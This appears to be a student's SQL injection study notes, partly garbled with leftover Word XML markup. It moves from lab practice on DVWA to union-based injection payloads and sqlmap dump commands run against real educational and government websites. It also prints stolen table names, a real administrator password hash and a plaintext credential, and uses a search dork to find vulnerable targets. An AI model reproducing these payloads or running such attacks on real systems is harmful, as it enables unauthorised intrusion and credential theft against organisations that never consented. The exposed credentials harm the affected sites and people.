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Day-15 (04/01/2020)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Injection attack, like XSS where user gives unsanitary input and web-app because of poor development or improper SDLC uses that attack vector to inject SQL queries.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Basic Auth Bypass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Manual sqli (union based sqli on MySQL database)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using automated tools (sqlmap)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Basic Auth Bypass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 -u root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databases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owsap10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accounts WHERE username='admin' AND password='admin';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 OR '1' = '1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accounts WHERE username=' ' or '1' = '1' AND password=' ' OR '1' = '1';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jeremy'--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blank space to be given at end of jeremy'-- to make it a commented line.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accounts WHERE username=' jeremy'-- ' AND password=' ';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Union based sqli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DVWA -&gt; low security -&gt; sql injection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http://192.168.1.4/dvwa/vulnerabilities/sqli/?id=3&amp;Submit=Submit#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http://192.168.1.4/dvwa/vulnerabilities/sqli/?id=3'&amp;Submit=Submit#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order by 1--+&amp;Submit=Submit#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order by 2--+&amp;Submit=Submit#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order by 3--+&amp;Submit=Submit# XXXX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of columns from which values being referred on current page == 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UNION SELECT 1,2--+&amp;Submit=Submit#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database()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user()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version()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UNION SELECT database(),user()--+&amp;Submit=Submit#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name == dvwa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UNION SELECT group_concat(table_name),2 from information_schema.tables where table_schema=database()--+&amp;Submit=Submit#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tables in dvwa == guestbook,users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UNION SELECT group_concat(column_name),2 from information_schema.columns where table_name='users'--+&amp;Submit=Submit#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UNION SELECT group_concat(user_id,first_name,last_name,user,password),2 from users--+&amp;Submit=Submit#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0x3a - hexadecimal for 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http://192.168.1.4/dvwa/vulnerabilities/sqli/?id=3' UNION SELECT group_concat(user_id,0x3a,first_name,0x3a,last_name,0x3a,user,0x3a,password),2 from users--+&amp;Submit=Submit#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1:admin:admin:admin:5f4dcc3b5aa765d61d8327deb882cf99,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2:Gordon:Brown:gordonb:e99a18c428cb38d5f260853678922e03,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3:Hack:Me:1337:8d3533d75ae2c3966d7e0d4fcc69216b,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4:Pablo:Picasso:pablo:0d107d09f5bbe40cade3de5c71e9e9b7,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5:Bob:Smith:smithy:5f4dcc3b5aa765d61d8327deb882cf99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1:admin:admin:admin:5f4dcc3b5aa765d61d8327deb882cf99:password,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2:Gordon:Brown:gordonb:e99a18c428cb38d5f260853678922e03:abc123,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3:Hack:Me:1337:8d3533d75ae2c3966d7e0d4fcc69216b:charley,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4:Pablo:Picasso:pablo:0d107d09f5bbe40cade3de5c71e9e9b7:letmein,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5:Bob:Smith:smithy:5f4dcc3b5aa765d61d8327deb882cf99:password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into outfile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union-based-sqli-steps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1.checking bby adding ' or " or ` to create error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2.if shows error, webapp might be vulnerable to sqli attack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3.if yes, then find the no of columns from which values are getting fetched(order by)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4.among the total no of columns, find columns vulnerabld to sqli(union select)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5.find the db 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6.find tables in db, select one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7.find columns in table in db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8.dump contents or any more attack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http://ami.edu.pk/page.php?p_id=100'</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 1--+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</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 1--+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</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 2--+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</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 11--+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</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 12--+ XXXX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no of columns referencing values for current page == 11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http://ami.edu.pk/page.php?p_id=100</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--+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http://ami.edu.pk/page.php?p_id=-100</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--+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http://ami.edu.pk/page.php?p_id=-100</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT 1,2,database(),database(),database(),6,7,8,9,10,11--+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http://ami.edu.pk/page.php?p_id=-100</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT 1,2,3,4,group_concat(table_name),6,7,8,9,10,11 from information_schema.tables where table_schema=database()--+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tblalbums,tblbanner,tblcareers,tblcareers_orig,tbldownloads,tblevents,tblgallery,tblnewsletters,tblpages,tblpartners,tblservices_accordians,tblsocials,tblstaff,tblstatistics,tbltestimonials,tblusers,tblvideos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http://ami.edu.pk/page.php?p_id=-100</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT 1,2,3,4,group_concat(column_name),6,7,8,9,10,11 from information_schema.columns where table_name='tblusers'--+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user_id,avator,full_name,username,password,status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http://ami.edu.pk/page.php?p_id=-100</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT 1,2,3,4,group_concat(user_id,0x3a,avator,0x3a,full_name,0x3a,username,0x3a,password,0x3a,status),6,7,8,9,10,11 from tblusers--+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1:avatar-mini-2.jpg:Administrator:admin:518522dba359eb3f9335ddfd6818d51e:1,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2:chat-avatar2.jpg:Muhammad Khurshid:developer866:nothing@143:1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518522dba359eb3f9335ddfd6818d51e-admin@ami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https://hashkiller.co.uk/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http://sqlmap.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - It is a penetration testing tool that automates the process of detecting and exploiting SQL injection flaws providing its user interface in the terminal.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inurl:ac.in</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> php?id=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http://www.stpeterscollege.ac.in/faculty-profile.php?id=23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sqlmap cmds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sqlmap -u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http://www.stpeterscollege.ac.in/faculty-profile.php?id=23</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dbs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sqlmap -u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http://www.stpeterscollege.ac.in/faculty-profile.php?id=23</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --current-db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sqlmap -u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http://www.stpeterscollege.ac.in/faculty-profile.php?id=23</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -D 'stpccaci_stpeters' --tables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sqlmap -u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http://www.stpeterscollege.ac.in/faculty-profile.php?id=23</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -D 'stpccaci_stpeters' -T login --columns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sqlmap -u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http://www.stpeterscollege.ac.in/faculty-profile.php?id=23</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -D 'stpccaci_stpeters' -T login -C username,pwd,id,f_id --dump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sqlmap -u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https://uidai.gov.in/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --crawl 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22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.stpeterscollege.ac.in/faculty-profile.php?id=23" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.stpeterscollege.ac.in/faculty-profile.php?id=23" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.stpeterscollege.ac.in/faculty-profile.php?id=23" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.stpeterscollege.ac.in/faculty-profile.php?id=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mi.edu.pk/page.php?p_id=100" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.stpeterscollege.ac.in/faculty-profile.php?id=23" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.stpeterscollege.ac.in/faculty-profile.php?id=23" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://uidai.gov.in/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ami.edu.pk/page.php?p_id=100" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ami.edu.pk/page.php?p_id=100'" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ami.edu.pk/page.php?p_id=100" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ami.edu.pk/page.php?p_id=100" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ami.edu.pk/page.php?p_id=100" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ami.edu.pk/page.php?p_id=-100" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ami.edu.pk/page.php?p_id=100" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ami.edu.pk/page.php?p_id=-100" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ami.edu.pk/page.php?p_id=-100" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ami.edu.pk/page.php?p_id=-100" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ami.edu.pk/page.php?p_id=-100" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.org/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashkille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